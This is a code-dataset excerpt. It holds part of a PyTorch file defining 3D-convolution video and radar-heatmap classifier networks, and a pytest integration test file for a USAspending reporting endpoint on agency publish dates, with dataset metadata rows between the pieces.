self.max1 = TimeDistributed(nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2), padding=(1, 1)))
self.conv2 = TimeDistributed(nn.Sequential(
nn.Conv2d(4, 8, kernel_size=(3, 3), padding=(0, 1)),
nn.BatchNorm2d(8),
nn.ReLU()))
self.max2 = TimeDistributed(nn.MaxPool2d(kernel_size=(3, 3), stride=(2, 2), padding=(0, 0)))
self.pool = nn.MaxPool3d(kernel_size=(8, 1, 1), stride=(1, 1, 1))
def forward(self, x):
out = self.conv1(x) # (n, 4, 10, 5)
out = self.max1(out) # (n, 4, 5, 3)
out = self.conv2(out) # (n, 4, 3, 3)
out = self.max2(out)
out = self.pool(out)
out = out.view(out.size(0), out.size(1))
return out
class C3D_VIDEO_V2(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO_V2, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 16, kernel_size=3, padding=1),
nn.BatchNorm3d(16),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(16, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=0),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.Conv3d(64, 64, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 3, 3), padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
# self.group5 = nn.Sequential(
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
last_duration = 2
last_size = 5
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
logits = self.group4(out)
# out = self.group5(out)
out = logits.view(logits.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return logits, out
class C3D_VIDEO_V3(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO_V3, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=3, padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 256, kernel_size=(3, 3, 3), padding=1),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 3, 3), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 2, 2)))
# self.group5 = nn.Sequential(
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
last_duration = 2
last_size = 5
self.fc1 = nn.Sequential(
nn.Linear((256 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
# out = self.group5(out)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3D_VIDEO(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=3, padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 5, 5), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 4, 4)))
# self.group5 = nn.Sequential(
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.Conv3d(512, 512, kernel_size=3, padding=1),
# nn.BatchNorm3d(512),
# nn.ReLU(),
# nn.MaxPool3d(kernel_size=(1, 2, 2), stride=(2, 2, 2), padding=(0, 1, 1)))
last_duration = 1
last_size = 1
self.fc1 = nn.Sequential(
nn.Linear((256 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out = self.group1(x)
out = self.group2(out)
out = self.group3(out)
out = self.group4(out)
# out = self.group5(out)
out = out.view(out.size(0), -1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc(out)
return out
class C3D_VIDEO_out(nn.Module):
def __init__(self,
sample_size,
sample_duration,
num_classes=600):
super(C3D_VIDEO_out, self).__init__()
self.group1 = nn.Sequential(
nn.Conv3d(3, 32, kernel_size=3, padding=1),
nn.BatchNorm3d(32),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(1, 2, 2)))
self.group2 = nn.Sequential(
nn.Conv3d(32, 64, kernel_size=3, padding=1),
nn.BatchNorm3d(64),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 2, 2)))
self.group3 = nn.Sequential(
nn.Conv3d(64, 128, kernel_size=3, padding=0),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.Conv3d(128, 128, kernel_size=(3, 5, 5), padding=1),
nn.BatchNorm3d(128),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 3, 3), stride=(2, 4, 4)))
self.group4 = nn.Sequential(
nn.Conv3d(128, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.Conv3d(256, 256, kernel_size=(3, 5, 5), padding=0),
nn.BatchNorm3d(256),
nn.ReLU(),
nn.MaxPool3d(kernel_size=(2, 2, 2), stride=(2, 4, 4)))
last_duration = 1
last_size = 1
self.fc1 = nn.Sequential(
nn.Linear((256 * last_duration * last_size * last_size), 128),
nn.ReLU(),
nn.Dropout(0.5))
self.fc2 = nn.Sequential(
nn.Linear(128, 32),
nn.ReLU(),
nn.Dropout(0.5))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, x):
out1 = self.group1(x)
out2 = self.group2(out1)
out3 = self.group3(out2)
out4 = self.group4(out3)
# out = self.group5(out)
out = out4.view(out4.size(0), -1)
out5 = self.fc1(out)
out6 = self.fc2(out5)
out = self.fc(out6)
return out5, out
class HeatmapPhaseNet(nn.Module):
def __init__(self,
sample_duration,
num_classes=600):
super(HeatmapPhaseNet, self).__init__()
self.net_azimuth = SubNet()
self.net_elevation = SubNet()
self.net_phase = PhaseNet()
last_duration = int(math.floor(sample_duration / 8))
last_size_h = 2
last_size_w = 2
self.fc1 = nn.Sequential(
nn.Linear((128 * last_duration * last_size_h * last_size_w + 96 * 20), 2048),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc2 = nn.Sequential(
nn.Linear(2048, 256),
nn.ReLU(),
nn.Dropout(0.5)
)
self.fc3 = nn.Sequential(
nn.Linear(256, 32))
self.fc = nn.Sequential(
nn.Linear(32, num_classes))
def forward(self, azi, ele, phase):
out_azi = self.net_azimuth(azi)
out_ele = self.net_elevation(ele)
out_phase = self.net_phase(phase)
# get output from heatmap and phase
out_heatmap = torch.cat((out_azi, out_ele), dim=1)
out_heatmap = out_heatmap.view(out_heatmap.size(0), -1)
out_phase = out_phase.view(out_phase.size(0), -1)
out = torch.cat((out_heatmap, out_phase), dim=1)
out = self.fc1(out)
out = self.fc2(out)
out = self.fc3(out)
out = self.fc(out)
return out
def get_fine_tuning_parameters(model, ft_portion):
if ft_portion == "complete":
return model.parameters()
elif ft_portion == "last_layer":
ft_module_names = []
ft_module_names.append('fc')
parameters = []
for k, v in model.named_parameters():
for ft_module in ft_module_names:
if ft_module in k:
parameters.append({'params': v})
break
else:
parameters.append({'params': v, 'lr': 0.0})
return parameters
else:
raise ValueError("Unsupported ft_portion: 'complete' or 'last_layer' expected")
if __name__ == '__main__':
device = torch.device('cuda')
model = HeatmapPhaseNet(sample_duration=100, num_classes=7)
# model = SubNet()
model = model.to(device)
input1 = torch.randn(8, 1, 100, 91, 10)
input2 = torch.randn(8, 1, 100, 91, 10)
input3 = torch.randn(8, 12, 10, 100)
input1 = input1.to(device)
input2 = input2.to(device)
input3 = input3.to(device)
# output = model(input1)
output = model(input1, input2, input3)
print(output.size())
| 33.611848 | 100 | 0.529528 | 5,137 | 38,015 | 3.766011 | 0.050419 | 0.06513 | 0.041766 | 0.068386 | 0.811899 | 0.791637 | 0.78197 | 0.764241 | 0.760105 | 0.743771 | 0 | 0.086292 | 0.325687 | 38,015 | 1,130 | 101 | 33.641593 | 0.668409 | 0.057767 | 0 | 0.73913 | 0 | 0 | 0.003106 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.051282 | false | 0 | 0.010033 | 0 | 0.114827 | 0.004459 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8e1f6f050f8543fb49c9dadc3d112c6e193cba36 | 28,476 | py | Python | usaspending_api/reporting/tests/integration/test_agencies_publish_dates.py | beboplove/usaspending-api | ee4fb35e2d5bcdc68f6c0d4240871ea298e532d9 | [
"CC0-1.0"
] | null | null | null | usaspending_api/reporting/tests/integration/test_agencies_publish_dates.py | beboplove/usaspending-api | ee4fb35e2d5bcdc68f6c0d4240871ea298e532d9 | [
"CC0-1.0"
] | null | null | null | usaspending_api/reporting/tests/integration/test_agencies_publish_dates.py | beboplove/usaspending-api | ee4fb35e2d5bcdc68f6c0d4240871ea298e532d9 | [
"CC0-1.0"
] | null | null | null | import pytest
from model_mommy import mommy
from rest_framework import status
url = "/api/v2/reporting/agencies/publish_dates/"
@pytest.fixture
def publish_dates_data(db):
dabs1 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=1, submission_reveal_date="2020-01-01 00:00:00.000000+00"
)
dabs2 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=2, submission_reveal_date="2020-01-02 00:00:00.000000+00"
)
dabs3 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=3, submission_reveal_date="2019-01-01 00:00:00.000000+00"
)
dabs4 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=4, submission_reveal_date="2019-01-02 00:00:00.000000+00"
)
tas1 = mommy.make("accounts.TreasuryAppropriationAccount", funding_toptier_agency_id="001")
tas2 = mommy.make("accounts.TreasuryAppropriationAccount", funding_toptier_agency_id="002")
mommy.make("accounts.AppropriationAccountBalances", treasury_account_identifier=tas1)
mommy.make("accounts.AppropriationAccountBalances", treasury_account_identifier=tas2)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=1,
toptier_code="001",
reporting_fiscal_year=2020,
reporting_fiscal_period=3,
reporting_fiscal_quarter=1,
quarter_format_flag=True,
published_date="2020-01-30 07:46:21.419796+00",
certified_date="2020-01-30 07:46:21.419796+00",
submission_window=dabs1,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=2,
toptier_code="001",
reporting_fiscal_year=2020,
reporting_fiscal_period=7,
reporting_fiscal_quarter=3,
quarter_format_flag=False,
published_date="2020-05-02 07:46:21.419796+00",
certified_date="2020-05-02 07:46:21.419796+00",
submission_window=dabs2,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=3,
toptier_code="001",
reporting_fiscal_year=2019,
reporting_fiscal_period=12,
reporting_fiscal_quarter=4,
quarter_format_flag=True,
published_date="2020-10-02 07:46:21.419796+00",
certified_date="2020-10-02 07:46:21.419796+00",
submission_window=dabs3,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=4,
toptier_code="002",
reporting_fiscal_year=2019,
reporting_fiscal_period=11,
reporting_fiscal_quarter=4,
quarter_format_flag=False,
published_date="2020-08-02 07:46:21.419796+00",
certified_date="2020-08-02 07:46:21.419796+00",
submission_window=dabs4,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2020,
fiscal_period=3,
total_budgetary_resources=100.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2020,
fiscal_period=7,
total_budgetary_resources=50.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2019,
fiscal_period=12,
total_budgetary_resources=200.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="002",
fiscal_year=2019,
fiscal_period=11,
total_budgetary_resources=300.00,
)
mommy.make(
"references.ToptierAgency", toptier_agency_id=1, toptier_code="001", name="Test Agency", abbreviation="TA"
)
mommy.make(
"references.ToptierAgency", toptier_agency_id=2, toptier_code="002", name="Test Agency 2", abbreviation="TA2"
)
mommy.make("references.Agency", id=1, toptier_agency_id=1)
mommy.make("references.Agency", id=2, toptier_agency_id=2)
def test_basic_success(client, publish_dates_data):
resp = client.get(url + "?fiscal_year=2020")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 2
expected_results = [
{
"agency_name": "Test Agency",
"abbreviation": "TA",
"toptier_code": "001",
"current_total_budget_authority_amount": 150.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {
"publication_date": "2020-01-30 07:46:21.419796+00",
"certification_date": "2020-01-30 07:46:21.419796+00",
},
"quarterly": True,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {
"publication_date": "2020-05-02 07:46:21.419796+00",
"certification_date": "2020-05-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 0.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
]
assert response["results"] == expected_results
def test_different_agencies(client, publish_dates_data):
resp = client.get(url + "?fiscal_year=2019")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 2
expected_results = [
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 300.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-08-02 07:46:21.419796+00",
"certification_date": "2020-08-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
{
"agency_name": "Test Agency",
"abbreviation": "TA",
"toptier_code": "001",
"current_total_budget_authority_amount": 200.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-10-02 07:46:21.419796+00",
"certification_date": "2020-10-02 07:46:21.419796+00",
},
"quarterly": True,
},
],
},
]
assert response["results"] == expected_results
def test_filter(client, publish_dates_data):
expected_results = [
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 300.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-08-02 07:46:21.419796+00",
"certification_date": "2020-08-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
}
]
resp = client.get(url + "?fiscal_year=2019&filter=Agency 2")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 1
assert response["results"] == expected_results
resp = client.get(url + "?fiscal_year=2019&filter=a2")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 1
assert response["results"] == expected_results
def test_fiscal_year_required(client, publish_dates_data):
resp = client.get(url)
assert resp.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
response = resp.json()
assert response == {"detail": "Missing value: 'fiscal_year' is a required field"}
def test_publication_date_sort(client, publish_dates_data):
resp = client.get(url + "?fiscal_year=2019&sort=publication_date")
assert resp.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
response = resp.json()
assert response == {
"detail": "publication_date sort param must be in the format 'publication_date,<fiscal_period>' where <fiscal_period> is in the range 2-12"
}
dabs5 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=5, submission_reveal_date="2020-01-05 00:00:00.000000+00"
)
dabs6 = mommy.make(
"submissions.DABSSubmissionWindowSchedule", pk=6, submission_reveal_date="2020-01-06 00:00:00.000000+00"
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=5,
toptier_code="001",
reporting_fiscal_year=2019,
reporting_fiscal_period=3,
reporting_fiscal_quarter=1,
quarter_format_flag=True,
published_date="2020-01-28 07:46:21.419796+00",
certified_date="2020-01-02 07:46:21.419796+00",
submission_window=dabs5,
)
mommy.make(
"submissions.SubmissionAttributes",
submission_id=6,
toptier_code="002",
reporting_fiscal_year=2019,
reporting_fiscal_period=3,
reporting_fiscal_quarter=1,
quarter_format_flag=True,
published_date="2020-01-01 07:46:21.419796+00",
certified_date="2020-01-28 07:46:21.419796+00",
submission_window=dabs6,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="001",
fiscal_year=2019,
fiscal_period=3,
total_budgetary_resources=10.00,
)
mommy.make(
"reporting.ReportingAgencyOverview",
toptier_code="002",
fiscal_year=2019,
fiscal_period=3,
total_budgetary_resources=10.00,
)
resp = client.get(url + "?fiscal_year=2019&sort=publication_date,3&order=desc")
assert resp.status_code == status.HTTP_200_OK
response = resp.json()
assert len(response["results"]) == 2
expected_results = [
{
"agency_name": "Test Agency",
"abbreviation": "TA",
"toptier_code": "001",
"current_total_budget_authority_amount": 210.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {
"publication_date": "2020-01-28 07:46:21.419796+00",
"certification_date": "2020-01-02 07:46:21.419796+00",
},
"quarterly": True,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-10-02 07:46:21.419796+00",
"certification_date": "2020-10-02 07:46:21.419796+00",
},
"quarterly": True,
},
],
},
{
"agency_name": "Test Agency 2",
"abbreviation": "TA2",
"toptier_code": "002",
"current_total_budget_authority_amount": 310.00,
"periods": [
{
"period": 2,
"quarter": 1,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 3,
"quarter": 1,
"submission_dates": {
"publication_date": "2020-01-01 07:46:21.419796+00",
"certification_date": "2020-01-28 07:46:21.419796+00",
},
"quarterly": True,
},
{
"period": 4,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 5,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 6,
"quarter": 2,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 7,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 8,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 9,
"quarter": 3,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 10,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
{
"period": 11,
"quarter": 4,
"submission_dates": {
"publication_date": "2020-08-02 07:46:21.419796+00",
"certification_date": "2020-08-02 07:46:21.419796+00",
},
"quarterly": False,
},
{
"period": 12,
"quarter": 4,
"submission_dates": {"publication_date": "", "certification_date": ""},
"quarterly": False,
},
],
},
]
assert response["results"] == expected_results
| 37.272251 | 147 | 0.430433 | 2,090 | 28,476 | 5.633014 | 0.071292 | 0.104476 | 0.17005 | 0.196212 | 0.942241 | 0.893485 | 0.862397 | 0.817124 | 0.790962 | 0.746794 | 0 | 0.07964 | 0.441319 | 28,476 | 763 | 148 | 37.321101 | 0.660381 | 0 | 0 | 0.608345 | 0 | 0.001346 | 0.304994 | 0.045969 | 0 | 0 | 0 | 0 | 0.025572 | 1 | 0.008075 | false | 0 | 0.004038 | 0 | 0.012113 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f3cf142b4cdc5ad9e20795b830d0b88605235320 | 45,625 | py | Python | tests/test_butterfly_multiply.py | iclr-anonymous/kaleidoscope | 2ad84d2da9c007b2774e2ba048ce4ca40d56b29a | [
"Apache-2.0"
] | 5 | 2019-11-08T03:56:24.000Z | 2020-02-08T00:36:37.000Z | tests/test_butterfly_multiply.py | iclr-anonymous/kaleidoscope | 2ad84d2da9c007b2774e2ba048ce4ca40d56b29a | [
"Apache-2.0"
